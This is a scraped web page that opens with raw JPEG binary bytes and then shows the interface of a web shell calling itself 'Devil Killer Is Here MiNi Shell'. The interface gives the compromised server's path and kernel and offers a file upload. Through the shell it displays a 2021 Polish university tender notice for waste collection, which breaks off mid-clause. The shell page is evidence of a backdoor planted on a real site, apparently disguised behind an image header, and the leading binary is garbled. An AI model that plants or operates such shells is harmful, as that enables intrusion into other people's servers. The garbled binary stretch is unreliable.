JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210723/0012569401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00125694 z dnia 2021-07-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wywóz odpadów komunalnych z jednostek organizacyjnych Warszawskiego Uniwersytetu Medycznego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Warszawski Uniwersytet Medyczny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288917</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żwirki i Wigury 61</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-091</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 572 03 88</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">aez@wum.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wum.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> uczelnia publiczna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wywóz odpadów komunalnych z jednostek organizacyjnych Warszawskiego Uniwersytetu Medycznego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f7e9ef07-eba0-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00125694</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004574/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.28 Odbiór i utylizacja odpadów komunalnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wum.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://wum.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>niniejszym postępowaniu, komunikacja zamawiającego z wykonawcami odbywa się przy użyciu<br/>platformy zakupowej „e-zamawiający” 2.Wymagania sprzętowo-aplikacyjne 1) stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; 2) komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min 2GB RAM, jeden z systemów operacyjnych - MS Windows 7 ,<br/>Mac Os x 10.4, Linux, lub ich nowsze wersje; 3) zainstalowana dowolna przeglądarka internetowa<br/>obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja<br/>10.0; 4) włączona obsługa JavaScript; 5) zainstalowany program Acrobat Reader lub inny obsługujący<br/>pliki w formacie .pdf. 3. Zasady korzystania z Platformy „e-zamawiający” 1) Zgłoszenie do<br/>postępowania wymaga zalogowania Wykonawcy do systemu Market Planet na subdomenie<br/>Warszawskiego Uniwersytetu Medycznego; 2) Wykonawca po wybraniu opcji „przystąp do<br/>postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie<br/>powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada<br/>konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie<br/>powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 3)<br/>Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci<br/>elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się<br/>pod numerem telefonu podanym w potwierdzeniu. 4) Po założeniu konta Wykonawca ma możliwość<br/>złożenia oferty wraz załącznikami, poprzez dodanie ww. dokumentów w zakładce „Oferty". Czynności<br/>określone powyżej realizowane są poprzez wybranie polecenia „dodaj dokument" i wybranie<br/>docelowego pliku, który ma zostać wczytany do systemu. 5) Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności przekazywanie wszelkich zawiadomień, wyjaśnień oraz innych<br/>informacji, następuje przy użyciu zakładki „Korespondencja” poprzez wybranie polecenia „Dodaj<br/>dokument" lub z wykorzystaniem opcji okna dialogowego „Zadaj pytanie”, w którym należy uzupełnić<br/>dane Wykonawcy, temat i treść pytania lub informacji. Za datę przekazania zaświadczeń oraz<br/>informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”, z<br/>zastrzeżeniem pkt 6. 6) Komunikacja pomiędzy Zamawiającym, a Wykonawcą może również odbywać<br/>się za pomocą poczty elektronicznej e-mail: aez@wum.edu.pl, w szczególności w sprawach dotyczących wyjaśnienia treści SWZ, o których mowa w Rozdziale XIX. 7) W przypadku, gdy w<br/>prowadzonym postępowaniu Wykonawca zastrzeże określone informacje jako tajemnicę<br/>przedsiębiorstwa, informacje te winny być zawarte w odrębnym dokumencie i dokument ten należy<br/>złożyć poprzez wybranie polecenia „Dodaj dokument” wskazując typ dokumentu: „Tajemnica<br/>przedsiębiorstwa”, 4. Dopuszczalne formaty przesyłanych danych Dokumenty o objętości każdego z<br/>plików do 100 MB mogą być składane w formacie: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx,<br/>xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg,<br/>ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES,<br/>ASIC, XMLenc.Zasady podpisywania dokumentów elektronicznych 1) dokumenty, o których mowa w<br/>Rozdziale XIV ust. 1 i 2, opatrywane są kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym poza Platformą. 2) W przypadku podpisu kwalifikowanego: a) dokumenty w<br/>formacie „pdf" zaleca się podpisywać formatem PAdES i wybierać typ otoczony;b) inne formaty plików (<br/>np. doc, docx, xls, xlsx..) należy podpisywać formatemXAdES oraz zaleca się typ podpisu otoczony.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest:<br/>WARSZAWSKI UNIWERSYTET MEDYCZNY, ul. Żwirki i Wigury 61,02-091 Warszawa<br/>reprezentowany przez Rektora WUM; 2. Administrator powołał Inspektora Ochrony Danych<br/>Osobowych, z którym można się kontaktować na adres e-mail: iod@wum.edu.pl, tel.: +48 22 57 20<br/>320;Informacja dotycząca przetwarzania danych osobowych zawarta jest w Rozdziale XXXII SWZ.3.<br/>Zamawiający jednocześnie informuje, że Wykonawca ubiegając się o udzielenie niniejszego<br/>zamówienia jest zobowiązany do wypełnienia obowiązku informacyjnego przewidzianego w art. 13 lub<br/>14 RODO względem osób fizycznych, których dane osobowe Wykonawca bezpośrednio lub pośrednio<br/>pozyskał i których dane przekaże Zamawiającemu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO lub zgodnie z art. 13 ust. 4 RODO, osoba fizyczna,<br/>której dane dotyczą, dysponuje informacjami, o których mowa na wstępie. W świetle powyższego<br/>Wykonawca, na druku Formularza ofertowego, stanowiącego Załącznik nr 1 do SWZ, zobowiązany jest<br/>złożyć oświadczenie dot. wypełnienia obowiązku informacyjnego przewidzianego w art. 13 lub art. 14<br/>RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu<br/>ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:1) w związku z art. 17 ust. 3 lit.<br/>b, d lub e RODO prawo do usunięcia danych osobowych;2) prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;3) na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AEZ/S-035/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest wywóz odpadów komunalnych (odpady zmieszane, papier, szkło, metale i tworzywa sztuczne, odpady biodegradowalne, gabaryty oraz makulatura) spod nieruchomości niezamieszkałych Zamawiającego. Zakres i miejsce świadczenia usług zawiera Formularz cenowy, stanowiący Załącznik nr 2 do SWZ. <br/>2.	Do obowiązków Wykonawcy należeć będzie:<br/>1)	ustawienie w miejscach wskazanych przez Zamawiającego pojemników na poszczególne rodzaje odpadów w ilościach i rozmiarach określonych w Formularzu cenowym (Załącznik nr 2 do SWZ), z zastrzeżeniem, że pojemniki na odpady gabarytowe i biodegradowalne o pojemności 7000 l (trawa, liście) będą podstawiane na żądanie Zamawiającego w terminie 5 dni od otrzymania zlecenia. Pojemniki winne być wykonane z plastiku, posiadać pokrywy otwierane od góry i posiadać opisy i kolorystykę odpowiadającą poszczególnym rodzajom odpadów. Nie dotyczy to pojemników KP5 i KP7;<br/>2)	wykonywanie usług zgodnie z obowiązującymi normami, przepisami prawa i częstotliwością określoną w Formularzu cenowym (Załącznik nr 2 do SWZ). Szczegółowy harmonogram uwzględniający dni wywozu odpadów w ciągu tygodnia zostanie ustalony przed rozpoczęciem świadczenia usług z Koordynatorami Sekcji Działu Administracyjno-Gospodarczego-Kampusy, administratorami domów studenckich, Centrum Sportowo-Rehabilitacyjnego oraz administratorem budynku CEPT, odpowiedzialnymi za administrowanie poszczególnymi obiektami Zamawiającego;<br/>3)	wykonywanie usług polegających na wywozie odpadów biodegradowalnych z pojemników o pojemności 7000 l, gabarytów i makulatury odbywać się będzie każdorazowo na zlecenie przekazane Wykonawcy za pośrednictwem poczty e-mail przez kierowników administracyjnych odpowiedzialnych za poszczególne obiekty;<br/>4)	za wszelkie szkody powstałe w związku z wykonywaniem zamówienia, odpowiedzialność ponosi Wykonawca;<br/>5)	sprzęt (w tym kontenery i pojemniki), materiały oraz transport niezbędny do realizacji zamówienia zapewnia Wykonawca; <br/>6)	Wykonawca jest zobowiązany do utrzymania czystości i porządku wokół ustawionych kontenerów i pojemników w promieniu przynajmniej 2 m przy każdorazowym opróżnianiu pojemników. <br/>3.	Usługi świadczone będą na warunkach określonych w Projekcie umowy, której wzór stanowi Załącznik nr 6 do SWZ.<br/>4.	Zgodnie z postanowieniem § 4 Projektu umowy Wykonawca jest obowiązany zawrzeć na własny koszt umowę lub kolejne umowy ubezpieczenia, ustanawiające ochronę ubezpieczeniową od odpowiedzialności cywilnej od dnia zawarcia umowy do dnia jej wykonania, obejmującą swoim zakresem wszelkie szkody jakie mogą zostać wyrządzone Zamawiającemu lub osobom trzecim w związku z realizacją postanowień niniejszej umowy. Suma ubezpieczenia OC nie może być niższa niż 500.000,00 złotych za jedno i wszystkie zdarzenia objęte umową OC. <br/>5.	Zamawiający wyznaczy termin wizji lokalnej na terenie objętym przedmiotem zamówienia, po zgłoszeniu takiego wniosku przez Wykonawców, przy czym miejscem spotkania będzie siedziba Warszawskiego Uniwersytetu Medycznego przy ul. Żwirki i Wigury 61, 02-091 Warszawa (budynek Rektoratu przy szatni). Wnioski w sprawie wizji lokalnej należy zgłaszać nie później niż do dnia 30.07.2021 r. na adres e-mail: aez@wum.edu.pl. Udział w wizji lokalnej, w rozumieniu art. 131 ust. 2 ustawy, nie jest obowiązkowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie uznana oferta z najniższą łączną ceną brutto.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zamawiający w oparciu o art. 112 określa nw. warunki udziału w postępowaniu <br/>w sposób proporcjonalny do przedmiotu zamówienia oraz umożliwiający ocenę zdolności wykonawcy do należytego wykonania zamówienia, w szczególności wyrażając je jako minimalne poziomy zdolności, o których mowa w ust. 2.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki <br/>w zakresie:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym; <br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/> <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów; <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że jest podmiotem wpisanym do:<br/>a)	Rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (zgodnie z art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2019, poz. 2010 z późń.zm.) prowadzonego przez Urząd Miasta Stołecznego Warszawa;<br/>b)	Rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO), o którym mowa w ustawie o odpadach z 14 grudnia 2012 r. (Dz.U. z 2020, poz.797 z późn.zm.);<br/>c)	spełnia wymagania określone w Rozporządzeniu Ministra Środowiska z 7 października 2016 w sprawie szczegółowych wymagań dla transportu odpadów (Dz.U. z 2016, poz. 1742).<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek dotyczący uprawnień jw. Zamawiający uzna za spełniony jeżeli co najmniej jeden z wykonawców posiada uprawnienia do określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy zobowiązani są do złożenia wraz z ofertą oświadczenia, z którego wynikać będzie, które usługi wykonają poszczególni Wykonawcy.<br/><br/>3)	sytuacji ekonomicznej lub finansowej; <br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/><br/>4)	zdolności technicznej lub zawodowej<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Środkiem dowodowym na potwierdzenie braku podstaw wykluczenia, o których mowa w Rozdziale VIII<br/>SWZ, jest oświadczenie sporządzone, wg wzoru stanowiącego Załącznik nr 3 do SWZ, którego treść<br/>odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1 ustawy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia zgodności oferowanych usług z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub kryteriami oceny ofert lub wymaganiami związanymi z realizacją zamówienia, w niniejszym postępowaniu Zamawiający nie określa szczegółowych wymagań. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, z zastrzeżeniem, że Wykonawca nie<br/>jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów.2. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę<br/>składa pełnomocnik. Pełnomocnictwo jest także wymagane w przypadku reprezentowania<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców: 1. Oświadczenie, o<br/>którym mowa w art. 125 ust. 1 ustawy stanowiące Załącznik nr 3 do SWZ, składa każdy z<br/>Wykonawców lub podmiot udostępniający zasoby.2. Pełnomocnictwo do reprezentowania<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W oparciu o art. 455 ust. 1 pkt 1 oraz 455 ust. 2 ustawy Prawo zamówień publicznych, Zamawiający zastrzega możliwość zmiany Umowy w formie pisemnego aneksu w zakresie:<br/>1)	zmiany lokalizacji pojemników, zmniejszenia liczby pojemników lub częstotliwości wywozu odpadów komunalnych;<br/>2)	w 